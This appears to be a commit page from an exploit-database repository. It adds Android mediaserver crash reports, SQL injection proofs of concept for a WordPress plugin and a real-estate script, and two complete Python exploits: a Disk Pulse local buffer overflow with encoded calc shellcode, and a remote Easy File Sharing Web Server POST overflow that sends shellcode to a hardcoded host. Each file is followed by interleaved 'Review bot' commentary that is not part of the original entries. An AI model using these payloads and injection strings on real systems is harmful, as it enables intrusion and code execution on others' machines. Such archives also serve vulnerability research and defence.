TFTP Server 1.4 - WRQ Buffer Overflow (Egghunter)
TFTP Server 1.4 - 'WRQ' Buffer Overflow (Egghunter)

Easy File Sharing Web Server 7.2 - SEH Overflow (Egghunter)
Easy File Sharing Web Server 7.2 - (SEH) Overflow (Egghunter)

Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow

Win32 - SEH omelet Shellcode
Win32 - SEH Omelet Shellcode
dotWidget CMS 1.0.6 - (file_path) Remote File Inclusion
DreamAccount 3.1 - (da_path) Remote File Inclusion
dotWidget CMS 1.0.6 - 'file_path' Remote File Inclusion
DreamAccount 3.1 - 'da_path' Remote File Inclusion

AWF CMS 1.11 - (spaw_root) Remote File Inclusion
AWF CMS 1.11 - 'spaw_root' Remote File Inclusion

Download-Engine 1.4.2 - (spaw) Remote File Inclusion
Download-Engine 1.4.2 - 'spaw' Remote File Inclusion

Newsscript 1.0 - Administrative Privilege Elevation
Newsscript 1.0 - Administrative Privilege Escalation

UBBCentral UBB.Threads 3.4/3.5 - Denial of Serviceearch.php SQL Injection
UBBCentral UBB.Threads 3.4/3.5 - 'Dosearch.php' SQL Injection

Cerberus Helpdesk 2.649 - cer_KnowledgebaseHandler.class.php _load_article_details Function SQL Injection
Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php' '_load_article_details' Function SQL Injection

cPanel 10.9 - Denial of Serviceetmytheme theme Parameter Cross-Site Scripting
cPanel 10.9 - dosetmytheme 'theme' Parameter Cross-Site Scripting

WordPress < 2.1.2  - PHP_Self Cross-Site Scripting
WordPress < 2.1.2 - PHP_Self Cross-Site Scripting
WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection
Real Estate Classifieds Script - SQL Injection
Offensive Security 2017-06-14 05:01:26 +00:00
parent 6bf2cee7fc
commit 2170122160
8 changed files with 644 additions and 222 deletions

files.csv (451 changed lines): diff suppressed because it is too large.

platforms/android/dos/42169.txt (new executable file, 64 lines)
@ -0,0 +1,64 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1221
Similar to the previously reported issue 1206 , when parsing AVI files the
CAVIFileParser object contains a fixed-size array of (what appears to be)
pointer/length pairs, used (I suppose) to store the data for each stream.
This is a fixed size, with 40 entries. However, it is never verified that the
number of streams in the file is less than this number; and when freeing the
CAVIFileParser object, we will iterate through this array past the end of the
object, freeing each non-NULL pointer entry.
This presents initially as a free of an uninitialised pointer, since there is
a correctly aligned field inside the CAVIFileParser object that does not appear
to be used at all; careful heap grooming can turn this into a free of an
attacker controlled value. It can also however be used to traverse outside the
object by ensuring that this uninitialised value is a NULL pointer, and instead
free pointers from the object following the CAVIFileParser object, resulting in
a use-after-free.
The attached sample file (and generation script) triggers the latter case, and
will usually crash attempting to free an invalid pointer from outside the bounds
of the CAVIFileParser object.
The two quirks of the attached sample file necessary to reach this vulnerability
are that the number of streams in the avi are larger than 40 and that the file
is truncated before the strl LIST objects are completed, to avoid triggering a
NULL-pointer dereference attempting to retrieve the movi information for the
file.
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
Revision: '11'
ABI: 'arm'
pid: 9473, tid: 9473, name: mediaserver >>> /system/bin/mediaserver <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xf0040070
AM write failed: Broken pipe
r0 00000002 r1 0000000f r2 ffffffd0 r3 f6dd12f0
r4 f6dd12e8 r5 f0051c88 r6 f6202000 r7 f0040000
r8 f6209008 r9 f6dc4594 sl 00000001 fp ffc82f9c
ip f004003c sp ffc82d38 lr f6da67a7 pc f6da3826 cpsr 200f0030
backtrace:
#00 pc 00055826 /system/lib/libc.so (ifree+49)
#01 pc 000587a3 /system/lib/libc.so (je_free+374)
#02 pc 000059ad /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParser7DestroyEv+164)
#03 pc 00005a33 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD1Ev+14)
#04 pc 00005a45 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD0Ev+4)
#05 pc 0000442f /system/lib/liblg_parser_avi.so (_ZN9AVIParser5CloseEv+12)
#06 pc 00025a49 /system/lib/libLGParserOSAL.so (_ZN7android14LGAVIExtractorC2ERKNS_2spINS_10DataSourceEEE+308)
#07 pc 00022a67 /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+38)
#08 pc 000c033b /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242)
#09 pc 000d66db /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetriever13setDataSourceERKNS_2spINS_10DataSourceEEE+34)
#10 pc 000591e3 /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient13setDataSourceERKNS_2spINS_11IDataSourceEEE+82)
#11 pc 0008e329 /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+468)
#12 pc 00019931 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60)
#13 pc 0001eccb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550)
#14 pc 0001ee35 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64)
#15 pc 0001ee99 /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48)
#16 pc 00001c15 /system/bin/mediaserver
#17 pc 000174a9 /system/lib/libc.so (__libc_init+44)
#18 pc 00001e68 /system/bin/mediaserver
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42169.zip
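Review bot: the register dump is interrupted by `AM write failed: Broken pipe` between the `signal 11` line and the `r0` row; that is an ActivityManager logcat line captured alongside the tombstone, not part of it, and it should be dropped so the dump reads (and parses) as one block. The backtrace deserves a sentence of interpretation next to it: the invalid free happens in `CAVIFileParser::Destroy` (frames #00 to #02) while the `LGAVIExtractor` constructor tears the parser down, and the request arrives through `MetadataRetrieverClient::setDataSource` (frame #10), so the bug is reached when a caller merely asks mediaserver for the file's metadata, not only on playback. The proof of concept is only a link to a zip; say what the archive contains (the crashing AVI, the generator script, or both) so the entry stands on its own.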

platforms/android/dos/42170.txt Executable file

@ -0,0 +1,80 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1206
Missing bounds-checking in AVI stream parsing
When parsing AVI files, CAVIFileParser uses the stream count from the AVI header
to allocate backing storage for storing metadata about the streams (member
variable m_aStream). However, the number of stream headers we parse is never
validated against this allocation size during parsing, so we can write further
metadata past the end of this buffer by constructing a file which contains more
stream headers than expected.
The allocation happens here:
int CAVIFileParser::ParseChunkAviHdr(int a2, unsigned int chunk_size)
{
struct AviHeader *avih;
int result;
// snip some sanity checking (have we already found an 'avih' chunk, is this
// chunk large enough to contain an avi header.)
result = AVISourceReader::AVI_fread(this->source, avih, sizeof(struct AviHeader), 1);
if ( result <= 0 )
{
// snip...
}
else
{
stream_count = avih->dwStreams; // <-- this is an attacker-controlled count
this->m_aStreamCount = stream_count;
this->m_aStream = malloc(stream_count * sizeof(struct AviStream));
this->m_aStreamIndex = -1;
// snip...
}
return 1;
}
There doesn't appear to be any integer overflow checking in the multiplication
either; so if the current issue is directly fixed there could still be a
vulnerability if stream_count * sizeof(struct AviStream) overflows.
this->m_aStreamIndex is incremented without checking in
CAVIFileParser::ParseChild and used as an index into m_aStream in several places
without checking, including in CAVIFileParser::ParseChunkStrHdr and
CAVIFileParser::ParseChunkStrFmt.
Several of the values that we can get written out of bounds are pointers to
controlled data, which is an interesting exploitation primitive. I've attached
a PoC file and script to generate it which results in overlapping a SRIFFNode*
with the contents of a 'strf' chunk, resulting in a free of an attacker
controlled pointer - in this case, 0x41414141. Since the structure sizes are
dependent on the version of the library, this may not work on different builds,
but it will hopefully cause a crash regardless.
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
Revision: '11'
ABI: 'arm'
pid: 19481, tid: 19585, name: Binder_2 >>> /system/bin/mediaserver <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x4140007c
r0 00000002 r1 00000012 r2 ffffffd0 r3 f6b572f0
AM write failed: Broken pipe
r4 f6b572e8 r5 41414141 r6 f5fb6000 r7 41400000
r8 f155c748 r9 f6b4a594 sl 00000001 fp f000081c
ip 41400048 sp f00005f8 lr f6b2c7a7 pc f6b29826 cpsr 200f0030
backtrace:
#00 pc 00055826 /system/lib/libc.so (ifree+49)
#01 pc 000587a3 /system/lib/libc.so (je_free+374)
#02 pc 000058f3 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParser15DeleteSRIFFNodeEP9SRIFFNode+54)
#03 pc 00005915 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParser7DestroyEv+12)
#04 pc 00005a33 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD1Ev+14)
#05 pc 00005a45 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD0Ev+4)
#06 pc 0000442f /system/lib/liblg_parser_avi.so (_ZN9AVIParser5CloseEv+12)
#07 pc 00025baf /system/lib/libLGParserOSAL.so (_ZN7android14LGAVIExtractorD1Ev+26)
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42170.zip
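Review bot: the write-up names two bugs around `ParseChunkAviHdr` but a reader could take the first as the whole fix: bounding `m_aStreamIndex` against `m_aStreamCount` in `ParseChild`, `ParseChunkStrHdr` and `ParseChunkStrFmt` closes the overrun, yet `stream_count * sizeof(struct AviStream)` still wraps for a large `dwStreams`, producing a short `m_aStream` buffer that the index check would then trust. Both need fixing: cap `dwStreams` at a sane maximum (or use an overflow-checked size computation) and check the index on every increment. Two smaller points: the decompiled snippet passes `avih` to `AVI_fread` without showing where it points, which reads like an uninitialised pointer, so mark it as elided decompiler output; and the tombstone again has a stray `AM write failed: Broken pipe` logcat line spliced between the `r0` and `r4` rows, which should be removed.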

platforms/android/dos/42171.txt Executable file

@ -0,0 +1,44 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1222
There is a memcpy in ASFParser::ParseHeaderExtensionObjects which doesn't check
that the size of the copy is smaller than the size of the source buffer,
resulting in an out-of-bounds heap read.
The vulnerable code appears to be in handling the parsing of an extension object of
type ASF_Metadata_Object with a Description Record with an overly large length.
See attached for a crash poc. This issue probably allows leaking mediaserver
memory from an app process on the device via the retrieved metadata.
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
Revision: '11'
ABI: 'arm'
pid: 10423, tid: 10533, name: Binder_2 >>> /system/bin/mediaserver <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xf05c0000
r0 ef5aff40 r1 f05bfff5 r2 00f5007f r3 00000000
r4 f050b280 r5 f0510000 r6 00ffffff r7 00000000
r8 000000b5 r9 00000034 sl 00000000 fp f05455a0
ip f05e2e1c sp f06f35c8 lr f05d8c9d pc f71d77b4 cpsr 200b0010
backtrace:
#00 pc 000177b4 /system/lib/libc.so (__memcpy_base+88)
#01 pc 00003c99 /system/lib/liblg_parser_asf.so (_ZN9ASFParser27ParseHeaderExtensionObjectsEv+436)
#02 pc 00006a87 /system/lib/liblg_parser_asf.so (_ZN9ASFParser6OpenExEP11IDataSourcei+50)
#03 pc 00024a93 /system/lib/libLGParserOSAL.so (_ZN7android12ASFExtractorC1ERKNS_2spINS_10DataSourceEEERKNS1_INS_8AMessageEEE+270)
#04 pc 00022aa9 /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+104)
#05 pc 000c033b /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242)
#06 pc 000d66db /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetriever13setDataSourceERKNS_2spINS_10DataSourceEEE+34)
#07 pc 000591e3 /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient13setDataSourceERKNS_2spINS_11IDataSourceEEE+82)
#08 pc 0008e329 /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+468)
#09 pc 00019931 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60)
#10 pc 0001eccb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550)
#11 pc 0001ee35 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64)
#12 pc 0001ee99 /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48)
#13 pc 00023909 /system/lib/libbinder.so
#14 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
#15 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
#16 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42171.zip
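Review bot: the registers back the description and the entry should say so: at the fault, r1 (the memcpy source) is 0xf05bfff5 and the fault address 0xf05c0000 is the first byte of the next page, while r2 is 0x00f5007f, a length of roughly 16 MiB that can only have come straight from the file. The fix is to bound each Description Record's length by the bytes remaining in the enclosing Header Extension object (and in the data source) before the copy. The impact sentence is hedged ("probably allows leaking mediaserver memory"); if the over-read bytes are handed back to the caller as metadata strings, demonstrate that with the PoC, otherwise this is a crash only, which matches where the entry is filed.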

platforms/php/webapps/42166.txt Executable file

@ -0,0 +1,43 @@
# Exploit Title: WP-Testimonials < 3.4.1 Union Based SQL Injection
# Date: 03-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu
# Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/
# Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/
# Version: 3.4.1
# CVE : CVE-2017-9418
# Category: webapps
1. Description:
SQL injection vulnerability in the WP-Testimonials plugin 3.4.1 for
WordPress allows an authenticated user to execute arbitrary SQL commands via
the testid parameter to wp-admin/admin.php.
2. Proof of Concept:
http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedi
t&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL--
comment
3. Solution:
The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.
4. Reference:
http://dtsa.eu/wp-testimonials-wordpress-plugin-v-3-4-1-union-based-sql-inje
ction-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9418
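Review bot: the title `WP-Testimonials < 3.4.1` contradicts the body: `Version: 3.4.1` and the description say 3.4.1 itself is injectable, and the solution says the plugin was pulled rather than patched, so the title should read `<= 3.4.1`. The PoC and reference URLs are wrapped mid-token (`sfststedi` / `t&testid=`, `sql-inje` / `ction-sqli`) and the payload's `-- comment` terminator is split onto its own line, so none of them can be pasted as-is; keep each URL on one line and URL-encode the payload (`--%20comment` or `-- -`) so the trailing comment survives. Since the eight-column `UNION ALL SELECT` runs under `wp-admin/admin.php?page=sfstst_manage`, the description should also state which authenticated role can reach that page; "an authenticated user" leaves the precondition open.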

platforms/php/webapps/42167.txt Executable file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Real Estate Classifieds Script - SQL Injection
# Dork: N/A
# Date: 12.06.2017
# Vendor : http://www.easyrealestatescript.com/
# Software: http://www.easyrealestatescript.com/demo.html
# Demo: http://www.easyrealestatescript.com/demo.html
# Version: N/A
# # # # #
# Author: EziBilisim
# Author Web: https://ezibilisim.com/
# Seo, Web tasarim, Web yazilim, Web guvenlik hizmetleri sunar.
# # # # #
# SQL Injection :
# http://localhost/[PATH]/site_search.php?s_purpose=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_title.php?listing=&xmonth=[SQL]&xyear=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_prev.php?listing=&xmonth=[SQL]&xyear=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_next.php?listing=&xmonth=[SQL]&xyear=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_big.php?listing=&xmonth=[SQL]&xyear=[SQL]
# # # # #
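Review bot: the finding is not reproducible as written: all five endpoints carry only a `[SQL]` placeholder, `listing=` is left empty, the version is `N/A`, and no payload, error message or extracted value is shown, so a reader cannot tell whether `s_purpose`, `xmonth` and `xyear` are error-based, boolean or union injectable, or whether the four calendar scripts share one vulnerable include. Give at least one concrete payload and its observable result per parameter, and fill in the version that was tested. The line `Seo, Web tasarim, Web yazilim, Web guvenlik hizmetleri sunar.` (Turkish: "Offers SEO, web design, web development and web security services") is advertising for the author's company and does not belong in an advisory.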


@ -0,0 +1,80 @@
#!/usr/bin/python
###############################################################################
# Exploit Title: Disk Pulse v9.7.26 - Add Directory Local Buffer Overflow
# Date: 12-06-2017
# Exploit Author: abatchy17 -- @abatchy17
# Vulnerable Software: Disk Pulse v9.7.26 (Freeware, Pro, Ultimate)
# Vendor Homepage: http://www.diskpulse.com/
# Version: 9.7.14
# Software Link: http://www.diskpulse.com/downloads.html (Freeware, Pro, Ultimate)
# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
#
# To trigger the exploit:
# 1. Under Directories, click the plus sign
# 2. Paste content of exploit.txt in Add Directory textbox.
#
# <--- Marry and reproduce --->
#
##############################################################################
a = open("exploit.txt", "w")
badchars = "\x0a\x0d\x2f"
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
# 0x651c541f : jmp ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\Disk Pulse\bin\QtGui4.dll)
jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad! Example: EBP: AAA\BBB, ESP -> AAA (without the \BBB part)
llamaleftovers = (
"\x55" # push EBP
"\x58" # pop EAX
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = EBP + 0x200
"\x40" # inc EAX, shellcode generated should start exactly here (EBP + 0x201) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)
junk = "\x55" + "\x53\x5b" * 107
data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf
a.write(data)
a.close()
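Review bot: the version is stated inconsistently: the title and "Vulnerable Software" say v9.7.26 while `# Version:` says 9.7.14; make them agree with the build that was tested. The arithmetic in the stub comments is also off: `0x55555555 + 0x55555555 + 0x55555656 = 0x100000100`, which wraps to `EBP + 0x100`, so after the `inc` EAX is `EBP + 0x101`, not `EBP + 0x201`. The layout does work out: from the start of the `\x40\x48` sled to `buf` is 40 + 18 + 215 = 273 = 0x111 bytes, so the stub lands on `buf` exactly when `jmp ebp` enters the sled 16 bytes in; say that in the comment, because the alpha_mixed decoder with `BufferRegister=EAX` needs EAX on the first byte of `buf` and a reader who checks the sum will conclude the exploit is broken. `badchars` is defined and never used.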


@ -0,0 +1,84 @@
#!/usr/bin/python
# Title : EFS Web Server 7.2 POST HTTP Request Buffer Overflow
# Author : Touhid M.Shaikh
# Date : 12 June, 2017
# Contact: touhidshaikh22@gmail.com
# Version: 7.2
# category: Remote Exploit
# Tested on: Windows XP SP3 EN [Version 5.1.2600]
"""
######## Description ########
What is Easy File Sharing Web Server 7.2 ?
Easy File Sharing Web Server is a file sharing software that allows
visitors to upload/download files easily through a Web Browser. It can help
you share files with your friends and colleagues. They can download files
from your computer or upload files from theirs.They will not be required to
install this software or any other software because an internet browser is
enough. Easy File Sharing Web Server also provides a Bulletin Board System
(Forum). It allows remote users to post messages and files to the forum.
The Secure Edition adds support for SSL encryption that helps protect
businesses against site spoofing and data corruption.
######## Video PoC and Article ########
https://www.youtube.com/watch?v=Mdmd-7M8j-M
http://touhidshaikh.com/blog/poc/EFSwebservr-postbufover/
"""
import httplib
total = 4096
#Shellcode Open CMD.exe
shellcode = (
"\x8b\xec\x55\x8b\xec"
"\x68\x65\x78\x65\x2F"
"\x68\x63\x6d\x64\x2e"
"\x8d\x45\xf8\x50\xb8"
"\xc7\x93\xc2\x77"
"\xff\xd0")
our_code = "\x90"*100 #NOP Sled
our_code += shellcode
our_code += "\x90"*(4072-100-len(shellcode))
# point Ret to Nop Sled
our_code += "\x3c\x62\x83\x01" # Overwrite RET
our_code += "\x90"*12 #Nop Sled
our_code += "A"*(total-(4072+16)) # ESP pointing
# Server address and POrt
httpServ = httplib.HTTPConnection("192.168.1.6", 80)
httpServ.connect()
httpServ.request('POST', '/sendemail.ghp',
'Email=%s&getPassword=Get+Password' % our_code)
response = httpServ.getresponse()
httpServ.close()
"""
NOTE : After Exiting to cmd.exe our server will be crash bcz of esp
Adjust esp by yourself ... hehhehhe...
"""
"""
__ __| _ \ | | | |_ _| __ \
| | | | | | | | | |
| | | | | ___ | | | |
_| \___/ \___/ _| _|___|____/
Touhid M.Shaikh
"""